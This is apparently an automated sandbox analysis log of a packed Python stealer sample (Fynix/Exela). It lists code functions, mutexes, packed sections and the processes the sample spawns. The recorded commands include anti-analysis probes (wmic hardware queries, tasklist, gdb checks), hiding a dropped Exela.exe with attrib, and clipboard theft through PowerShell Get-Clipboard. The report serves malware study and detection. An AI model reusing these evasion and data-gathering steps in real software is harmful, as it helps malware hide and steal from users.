            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93E428502_2_00007FFD93E42850
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93D11CC12_2_00007FFD93D11CC1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93D16FFF2_2_00007FFD93D16FFF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93D15A602_2_00007FFD93D15A60
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93D11A4B2_2_00007FFD93D11A4B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93D1707C2_2_00007FFD93D1707C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93D136932_2_00007FFD93D13693
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93EB2C402_2_00007FFD93EB2C40
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93D15E252_2_00007FFD93D15E25
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93D14E4E2_2_00007FFD93D14E4E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93D160DC2_2_00007FFD93D160DC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93D123F12_2_00007FFD93D123F1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 81_2_00007FFD33055B7F81_2_00007FFD33055B7F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: String function: 00007FFD93D124B9 appears 81 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: String function: 00007FFD93D1483B appears 121 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: String function: 00007FF7B2B62910 appears 34 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: String function: 00007FFD93D11EF1 appears 1470 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: String function: 00007FFD93D12A04 appears 172 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: String function: 00007FFD93D14D68 appears 38 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: String function: 00007FFD93D12734 appears 476 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: String function: 00007FF7B2B62710 appears 104 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: String function: 00007FFD93D1300D appears 55 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: String function: 00007FFD93D1698D appears 47 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: String function: 00007FFD93D14057 appears 720 times
            Source: _overlapped.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: python3.dll.0.drStatic PE information: No import functions for PE file found
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFynix.exej% vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119754812.000002BD86720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_uuid.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120845442.000002BD86720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120211904.000002BD86720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD86720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_multiprocessing.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120115665.000002BD86720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457245244.00007FFDA3472000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilenamelibsslH vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2460676756.00007FFDA549C000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457439135.00007FFDA355D000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2450302164.00007FFD93D07000.00000004.00000001.01000000.00000017.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459467676.00007FFDA4348000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457747412.00007FFDA36CE000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458141259.00007FFDA3733000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459169072.00007FFDA4177000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2460091484.00007FFDA4DAF000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457964302.00007FFDA370B000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458978291.00007FFDA3FDC000.00000004.00000001.01000000.00000023.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2460440524.00007FFDA5477000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2456768038.00007FFDA3304000.00000004.00000001.01000000.00000015.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000000.2126704993.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFynix.exej% vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458771892.00007FFDA3AFD000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458345789.00007FFDA3A93000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2454765569.00007FFD944E5000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython310.dll. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440853445.0000018B46A80000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459699045.00007FFDA4639000.00000004.00000001.01000000.0000001D.sdmpBinary or memory string: OriginalFilename_uuid.pyd. vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exeBinary or memory string: OriginalFilenameFynix.exej% vs SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: Commandline size = 3647
            Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: Commandline size = 3647Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
            Source: libcrypto-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.998771639088251
            Source: libssl-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9903694614553314
            Source: python310.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9993369105871887
            Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9979559935490694
            Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9941871279761905
            Source: classification engineClassification label: mal100.rans.spre.phis.troj.spyw.evad.winEXE@141/144@6/6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\ExelaUpdateService\Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeMutant created: \Sessions\1\BaseNamedObjects\E
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3004:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1708:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3928:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:884:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3700:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1016:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4876:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6552:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5904:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5140:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4188:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1112:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3768:120:WilError_03
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922Jump to behavior
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\cmd.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exeReversingLabs: Detection: 50%
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exeString found in binary or memory: set-addPolicy
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exeString found in binary or memory: id-cmc-addExtensions
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exeString found in binary or memory: can't send non-None value to a just-started generator
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exeString found in binary or memory: --help
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exeString found in binary or memory: --help
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "gdb --version"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get Manufacturer
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path Win32_ComputerSystem get Manufacturer
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
